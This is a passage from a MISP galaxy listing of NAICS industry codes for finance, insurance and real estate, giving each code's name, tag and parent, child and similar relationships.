  • similar: misp-galaxy:naics="51921" with estimative-language:likelihood-probability="likely"

51929

Web Search Portals and All Other Information Services

The tag is: misp-galaxy:naics="51929"

51929 has relationships with:

  • child-of: misp-galaxy:naics="5192" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="519290" with estimative-language:likelihood-probability="likely"

519290

Web Search Portals and All Other Information Services

The tag is: misp-galaxy:naics="519290"

519290 has relationships with:

  • child-of: misp-galaxy:naics="5192" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51929" with estimative-language:likelihood-probability="likely"

52

Finance and Insurance

The tag is: misp-galaxy:naics="52"

52 has relationships with:

  • parent-of: misp-galaxy:naics="521" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="523" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="525" with estimative-language:likelihood-probability="likely"

521

Monetary Authorities-Central Bank

The tag is: misp-galaxy:naics="521"

521 has relationships with:

  • child-of: misp-galaxy:naics="52" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5211" with estimative-language:likelihood-probability="likely"

5211

Monetary Authorities-Central Bank

The tag is: misp-galaxy:naics="5211"

5211 has relationships with:

  • child-of: misp-galaxy:naics="521" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="521110" with estimative-language:likelihood-probability="likely"

52111

Monetary Authorities-Central Bank

The tag is: misp-galaxy:naics="52111"

52111 has relationships with:

  • child-of: misp-galaxy:naics="5211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="521110" with estimative-language:likelihood-probability="likely"

521110

Monetary Authorities-Central Bank

The tag is: misp-galaxy:naics="521110"

521110 has relationships with:

  • child-of: misp-galaxy:naics="5211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52111" with estimative-language:likelihood-probability="likely"

522

Credit Intermediation and Related Activities

The tag is: misp-galaxy:naics="522"

522 has relationships with:

  • child-of: misp-galaxy:naics="52" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5223" with estimative-language:likelihood-probability="likely"

5221

Depository Credit Intermediation

The tag is: misp-galaxy:naics="5221"

5221 has relationships with:

  • child-of: misp-galaxy:naics="522" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52218" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522180" with estimative-language:likelihood-probability="likely"

52211

Commercial Banking

The tag is: misp-galaxy:naics="52211"

52211 has relationships with:

  • child-of: misp-galaxy:naics="5221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="522110" with estimative-language:likelihood-probability="likely"

522110

Commercial Banking

The tag is: misp-galaxy:naics="522110"

522110 has relationships with:

  • child-of: misp-galaxy:naics="5221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52211" with estimative-language:likelihood-probability="likely"

52213

Credit Unions

The tag is: misp-galaxy:naics="52213"

52213 has relationships with:

  • child-of: misp-galaxy:naics="5221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="522130" with estimative-language:likelihood-probability="likely"

522130

Credit Unions

The tag is: misp-galaxy:naics="522130"

522130 has relationships with:

  • child-of: misp-galaxy:naics="5221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52213" with estimative-language:likelihood-probability="likely"

52218

Savings Institutions and Other Depository Credit Intermediation

The tag is: misp-galaxy:naics="52218"

52218 has relationships with:

  • child-of: misp-galaxy:naics="5221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="522180" with estimative-language:likelihood-probability="likely"

522180

Savings Institutions and Other Depository Credit Intermediation

The tag is: misp-galaxy:naics="522180"

522180 has relationships with:

  • child-of: misp-galaxy:naics="5221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52218" with estimative-language:likelihood-probability="likely"

5222

Nondepository Credit Intermediation

The tag is: misp-galaxy:naics="5222"

5222 has relationships with:

  • child-of: misp-galaxy:naics="522" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52222" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522220" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52229" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522292" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522299" with estimative-language:likelihood-probability="likely"

52221

Credit Card Issuing

The tag is: misp-galaxy:naics="52221"

52221 has relationships with:

  • child-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="522210" with estimative-language:likelihood-probability="likely"

522210

Credit Card Issuing

The tag is: misp-galaxy:naics="522210"

522210 has relationships with:

  • child-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52221" with estimative-language:likelihood-probability="likely"

52222

Sales Financing

The tag is: misp-galaxy:naics="52222"

52222 has relationships with:

  • child-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="522220" with estimative-language:likelihood-probability="likely"

522220

Sales Financing

The tag is: misp-galaxy:naics="522220"

522220 has relationships with:

  • child-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52222" with estimative-language:likelihood-probability="likely"

52229

Other Nondepository Credit Intermediation

The tag is: misp-galaxy:naics="52229"

52229 has relationships with:

  • child-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

522291

Consumer Lending

The tag is: misp-galaxy:naics="522291"

522291 has relationships with:

  • child-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

522292

Real Estate Credit

The tag is: misp-galaxy:naics="522292"

522292 has relationships with:

  • child-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

522299

International, Secondary Market, and All Other Nondepository Credit Intermediation

The tag is: misp-galaxy:naics="522299"

522299 has relationships with:

  • child-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

5223

Activities Related to Credit Intermediation

The tag is: misp-galaxy:naics="5223"

5223 has relationships with:

  • child-of: misp-galaxy:naics="522" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52239" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522390" with estimative-language:likelihood-probability="likely"

52231

Mortgage and Nonmortgage Loan Brokers

The tag is: misp-galaxy:naics="52231"

52231 has relationships with:

  • child-of: misp-galaxy:naics="5223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="522310" with estimative-language:likelihood-probability="likely"

522310

Mortgage and Nonmortgage Loan Brokers

The tag is: misp-galaxy:naics="522310"

522310 has relationships with:

  • child-of: misp-galaxy:naics="5223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52231" with estimative-language:likelihood-probability="likely"

52232

Financial Transactions Processing, Reserve, and Clearinghouse Activities

The tag is: misp-galaxy:naics="52232"

52232 has relationships with:

  • child-of: misp-galaxy:naics="5223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="522320" with estimative-language:likelihood-probability="likely"

522320

Financial Transactions Processing, Reserve, and Clearinghouse Activities

The tag is: misp-galaxy:naics="522320"

522320 has relationships with:

  • child-of: misp-galaxy:naics="5223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52232" with estimative-language:likelihood-probability="likely"

52239

Other Activities Related to Credit Intermediation

The tag is: misp-galaxy:naics="52239"

52239 has relationships with:

  • child-of: misp-galaxy:naics="5223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="522390" with estimative-language:likelihood-probability="likely"

522390

Other Activities Related to Credit Intermediation

The tag is: misp-galaxy:naics="522390"

522390 has relationships with:

  • child-of: misp-galaxy:naics="5223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52239" with estimative-language:likelihood-probability="likely"

523

Securities, Commodity Contracts, and Other Financial Investments and Related Activities

The tag is: misp-galaxy:naics="523"

523 has relationships with:

  • child-of: misp-galaxy:naics="52" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5239" with estimative-language:likelihood-probability="likely"

5231

Securities and Commodity Contracts Intermediation and Brokerage

The tag is: misp-galaxy:naics="5231"

5231 has relationships with:

  • child-of: misp-galaxy:naics="523" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52315" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="523150" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52316" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="523160" with estimative-language:likelihood-probability="likely"

52315

Investment Banking and Securities Intermediation

The tag is: misp-galaxy:naics="52315"

52315 has relationships with:

  • child-of: misp-galaxy:naics="5231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="523150" with estimative-language:likelihood-probability="likely"

523150

Investment Banking and Securities Intermediation

The tag is: misp-galaxy:naics="523150"

523150 has relationships with:

  • child-of: misp-galaxy:naics="5231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52315" with estimative-language:likelihood-probability="likely"

52316

Commodity Contracts Intermediation

The tag is: misp-galaxy:naics="52316"

52316 has relationships with:

  • child-of: misp-galaxy:naics="5231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="523160" with estimative-language:likelihood-probability="likely"

523160

Commodity Contracts Intermediation

The tag is: misp-galaxy:naics="523160"

523160 has relationships with:

  • child-of: misp-galaxy:naics="5231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52316" with estimative-language:likelihood-probability="likely"

5232

Securities and Commodity Exchanges

The tag is: misp-galaxy:naics="5232"

5232 has relationships with:

  • child-of: misp-galaxy:naics="523" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="523210" with estimative-language:likelihood-probability="likely"

52321

Securities and Commodity Exchanges

The tag is: misp-galaxy:naics="52321"

52321 has relationships with:

  • child-of: misp-galaxy:naics="5232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="523210" with estimative-language:likelihood-probability="likely"

523210

Securities and Commodity Exchanges

The tag is: misp-galaxy:naics="523210"

523210 has relationships with:

  • child-of: misp-galaxy:naics="5232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52321" with estimative-language:likelihood-probability="likely"

5239

Other Financial Investment Activities

The tag is: misp-galaxy:naics="5239"

5239 has relationships with:

  • child-of: misp-galaxy:naics="523" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52391" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="523910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52394" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="523940" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52399" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="523991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="523999" with estimative-language:likelihood-probability="likely"

52391

Miscellaneous Intermediation

The tag is: misp-galaxy:naics="52391"

52391 has relationships with:

  • child-of: misp-galaxy:naics="5239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="523910" with estimative-language:likelihood-probability="likely"

523910

Miscellaneous Intermediation

The tag is: misp-galaxy:naics="523910"

523910 has relationships with:

  • child-of: misp-galaxy:naics="5239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52391" with estimative-language:likelihood-probability="likely"

52394

Portfolio Management and Investment Advice

The tag is: misp-galaxy:naics="52394"

52394 has relationships with:

  • child-of: misp-galaxy:naics="5239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="523940" with estimative-language:likelihood-probability="likely"

523940

Portfolio Management and Investment Advice

The tag is: misp-galaxy:naics="523940"

523940 has relationships with:

  • child-of: misp-galaxy:naics="5239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52394" with estimative-language:likelihood-probability="likely"

52399

All Other Financial Investment Activities

The tag is: misp-galaxy:naics="52399"

52399 has relationships with:

  • child-of: misp-galaxy:naics="5239" with estimative-language:likelihood-probability="likely"

523991

Trust, Fiduciary, and Custody Activities

The tag is: misp-galaxy:naics="523991"

523991 has relationships with:

  • child-of: misp-galaxy:naics="5239" with estimative-language:likelihood-probability="likely"

523999

Miscellaneous Financial Investment Activities

The tag is: misp-galaxy:naics="523999"

523999 has relationships with:

  • child-of: misp-galaxy:naics="5239" with estimative-language:likelihood-probability="likely"

524

Insurance Carriers and Related Activities

The tag is: misp-galaxy:naics="524"

524 has relationships with:

  • child-of: misp-galaxy:naics="52" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5242" with estimative-language:likelihood-probability="likely"

5241

Insurance Carriers

The tag is: misp-galaxy:naics="5241"

5241 has relationships with:

  • child-of: misp-galaxy:naics="524" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524126" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524127" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524128" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52413" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524130" with estimative-language:likelihood-probability="likely"

52411

Direct Life, Health, and Medical Insurance Carriers

The tag is: misp-galaxy:naics="52411"

52411 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

524113

Direct Life Insurance Carriers

The tag is: misp-galaxy:naics="524113"

524113 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

524114

Direct Health and Medical Insurance Carriers

The tag is: misp-galaxy:naics="524114"

524114 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

52412

Direct Insurance (except Life, Health, and Medical) Carriers

The tag is: misp-galaxy:naics="52412"

52412 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

524126

Direct Property and Casualty Insurance Carriers

The tag is: misp-galaxy:naics="524126"

524126 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

524127

Direct Title Insurance Carriers

The tag is: misp-galaxy:naics="524127"

524127 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

524128

Other Direct Insurance (except Life, Health, and Medical) Carriers

The tag is: misp-galaxy:naics="524128"

524128 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

52413

Reinsurance Carriers

The tag is: misp-galaxy:naics="52413"

52413 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="524130" with estimative-language:likelihood-probability="likely"

524130

Reinsurance Carriers

The tag is: misp-galaxy:naics="524130"

524130 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52413" with estimative-language:likelihood-probability="likely"

5242

Agencies, Brokerages, and Other Insurance Related Activities

The tag is: misp-galaxy:naics="5242"

5242 has relationships with:

  • child-of: misp-galaxy:naics="524" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52429" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524292" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524298" with estimative-language:likelihood-probability="likely"

52421

Insurance Agencies and Brokerages

The tag is: misp-galaxy:naics="52421"

52421 has relationships with:

  • child-of: misp-galaxy:naics="5242" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="524210" with estimative-language:likelihood-probability="likely"

524210

Insurance Agencies and Brokerages

The tag is: misp-galaxy:naics="524210"

524210 has relationships with:

  • child-of: misp-galaxy:naics="5242" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52421" with estimative-language:likelihood-probability="likely"

52429

Other Insurance Related Activities

The tag is: misp-galaxy:naics="52429"

52429 has relationships with:

  • child-of: misp-galaxy:naics="5242" with estimative-language:likelihood-probability="likely"

524291

Claims Adjusting

The tag is: misp-galaxy:naics="524291"

524291 has relationships with:

  • child-of: misp-galaxy:naics="5242" with estimative-language:likelihood-probability="likely"

524292

Pharmacy Benefit Management and Other Third Party Administration of Insurance and Pension Funds

The tag is: misp-galaxy:naics="524292"

524292 has relationships with:

  • child-of: misp-galaxy:naics="5242" with estimative-language:likelihood-probability="likely"

524298

All Other Insurance Related Activities

The tag is: misp-galaxy:naics="524298"

524298 has relationships with:

  • child-of: misp-galaxy:naics="5242" with estimative-language:likelihood-probability="likely"

525

Funds, Trusts, and Other Financial Vehicles

The tag is: misp-galaxy:naics="525"

525 has relationships with:

  • child-of: misp-galaxy:naics="52" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5251" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5259" with estimative-language:likelihood-probability="likely"

5251

Insurance and Employee Benefit Funds

The tag is: misp-galaxy:naics="5251"

5251 has relationships with:

  • child-of: misp-galaxy:naics="525" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="525110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="525120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52519" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="525190" with estimative-language:likelihood-probability="likely"

52511

Pension Funds

The tag is: misp-galaxy:naics="52511"

52511 has relationships with:

  • child-of: misp-galaxy:naics="5251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="525110" with estimative-language:likelihood-probability="likely"

525110

Pension Funds

The tag is: misp-galaxy:naics="525110"

525110 has relationships with:

  • child-of: misp-galaxy:naics="5251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52511" with estimative-language:likelihood-probability="likely"

52512

Health and Welfare Funds

The tag is: misp-galaxy:naics="52512"

52512 has relationships with:

  • child-of: misp-galaxy:naics="5251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="525120" with estimative-language:likelihood-probability="likely"

525120

Health and Welfare Funds

The tag is: misp-galaxy:naics="525120"

525120 has relationships with:

  • child-of: misp-galaxy:naics="5251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52512" with estimative-language:likelihood-probability="likely"

52519

Other Insurance Funds

The tag is: misp-galaxy:naics="52519"

52519 has relationships with:

  • child-of: misp-galaxy:naics="5251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="525190" with estimative-language:likelihood-probability="likely"

525190

Other Insurance Funds

The tag is: misp-galaxy:naics="525190"

525190 has relationships with:

  • child-of: misp-galaxy:naics="5251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52519" with estimative-language:likelihood-probability="likely"

5259

Other Investment Pools and Funds

The tag is: misp-galaxy:naics="5259"

5259 has relationships with:

  • child-of: misp-galaxy:naics="525" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52591" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="525910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52592" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="525920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52599" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="525990" with estimative-language:likelihood-probability="likely"

52591

Open-End Investment Funds

The tag is: misp-galaxy:naics="52591"

52591 has relationships with:

  • child-of: misp-galaxy:naics="5259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="525910" with estimative-language:likelihood-probability="likely"

525910

Open-End Investment Funds

The tag is: misp-galaxy:naics="525910"

525910 has relationships with:

  • child-of: misp-galaxy:naics="5259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52591" with estimative-language:likelihood-probability="likely"

52592

Trusts, Estates, and Agency Accounts

The tag is: misp-galaxy:naics="52592"

52592 has relationships with:

  • child-of: misp-galaxy:naics="5259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="525920" with estimative-language:likelihood-probability="likely"

525920

Trusts, Estates, and Agency Accounts

The tag is: misp-galaxy:naics="525920"

525920 has relationships with:

  • child-of: misp-galaxy:naics="5259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52592" with estimative-language:likelihood-probability="likely"

52599

Other Financial Vehicles

The tag is: misp-galaxy:naics="52599"

52599 has relationships with:

  • child-of: misp-galaxy:naics="5259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="525990" with estimative-language:likelihood-probability="likely"

525990

Other Financial Vehicles

The tag is: misp-galaxy:naics="525990"

525990 has relationships with:

  • child-of: misp-galaxy:naics="5259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52599" with estimative-language:likelihood-probability="likely"

53

Real Estate and Rental and Leasing

The tag is: misp-galaxy:naics="53"

53 has relationships with:

  • parent-of: misp-galaxy:naics="531" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="533" with estimative-language:likelihood-probability="likely"

531

Real Estate

The tag is: misp-galaxy:naics="531"

531 has relationships with:

  • child-of: misp-galaxy:naics="53" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5313" with estimative-language:likelihood-probability="likely"

5311

Lessors of Real Estate

The tag is: misp-galaxy:naics="5311"

5311 has relationships with:

  • child-of: misp-galaxy:naics="531" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53119" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531190" with estimative-language:likelihood-probability="likely"

53111

Lessors of Residential Buildings and Dwellings

The tag is: misp-galaxy:naics="53111"

53111 has relationships with:

  • child-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="531110" with estimative-language:likelihood-probability="likely"

531110

Lessors of Residential Buildings and Dwellings

The tag is: misp-galaxy:naics="531110"

531110 has relationships with:

  • child-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53111" with estimative-language:likelihood-probability="likely"

53112

Lessors of Nonresidential Buildings (except Miniwarehouses)

The tag is: misp-galaxy:naics="53112"

53112 has relationships with:

  • child-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="531120" with estimative-language:likelihood-probability="likely"

531120

Lessors of Nonresidential Buildings (except Miniwarehouses)

The tag is: misp-galaxy:naics="531120"

531120 has relationships with:

  • child-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53112" with estimative-language:likelihood-probability="likely"

53113

Lessors of Miniwarehouses and Self-Storage Units

The tag is: misp-galaxy:naics="53113"

53113 has relationships with:

  • child-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="531130" with estimative-language:likelihood-probability="likely"

531130

Lessors of Miniwarehouses and Self-Storage Units

The tag is: misp-galaxy:naics="531130"

531130 has relationships with:

  • child-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53113" with estimative-language:likelihood-probability="likely"

53119

Lessors of Other Real Estate Property

The tag is: misp-galaxy:naics="53119"

53119 has relationships with:

  • child-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="531190" with estimative-language:likelihood-probability="likely"

531190

Lessors of Other Real Estate Property

The tag is: misp-galaxy:naics="531190"

531190 has relationships with:

  • child-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53119" with estimative-language:likelihood-probability="likely"

5312

Offices of Real Estate Agents and Brokers

The tag is: misp-galaxy:naics="5312"

5312 has relationships with:

  • child-of: misp-galaxy:naics="531" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531210" with estimative-language:likelihood-probability="likely"

53121

Offices of Real Estate Agents and Brokers

The tag is: misp-galaxy:naics="53121"

53121 has relationships with:

  • child-of: misp-galaxy:naics="5312" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="531210" with estimative-language:likelihood-probability="likely"

531210

Offices of Real Estate Agents and Brokers

The tag is: misp-galaxy:naics="531210"

531210 has relationships with:

  • child-of: misp-galaxy:naics="5312" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53121" with estimative-language:likelihood-probability="likely"

5313

Activities Related to Real Estate

The tag is: misp-galaxy:naics="5313"

5313 has relationships with:

  • child-of: misp-galaxy:naics="531" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53139" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531390" with estimative-language:likelihood-probability="likely"

53131

Real Estate Property Managers

The tag is: misp-galaxy:naics="53131"

53131 has relationships with:

  • child-of: misp-galaxy:naics="5313" with estimative-language:likelihood-probability="likely"

531311

Residential Property Managers

The tag is: misp-galaxy:naics="531311"

531311 has relationships with:

  • child-of: misp-galaxy:naics="5313" with estimative-language:likelihood-probability="likely"

531312

Nonresidential Property Managers

The tag is: misp-galaxy:naics="531312"

531312 has relationships with:

  • child-of: misp-galaxy:naics="5313" with estimative-language:likelihood-probability="likely"

53132

Offices of Real Estate Appraisers

The tag is: misp-galaxy:naics="53132"

53132 has relationships with:

  • child-of: misp-galaxy:naics="5313" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="531320" with estimative-language:likelihood-probability="likely"

531320

Offices of Real Estate Appraisers

The tag is: misp-galaxy:naics="531320"

531320 has relationships with:

  • child-of: misp-galaxy:naics="5313" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53132" with estimative-language:likelihood-probability="likely"

53139

Other Activities Related to Real Estate

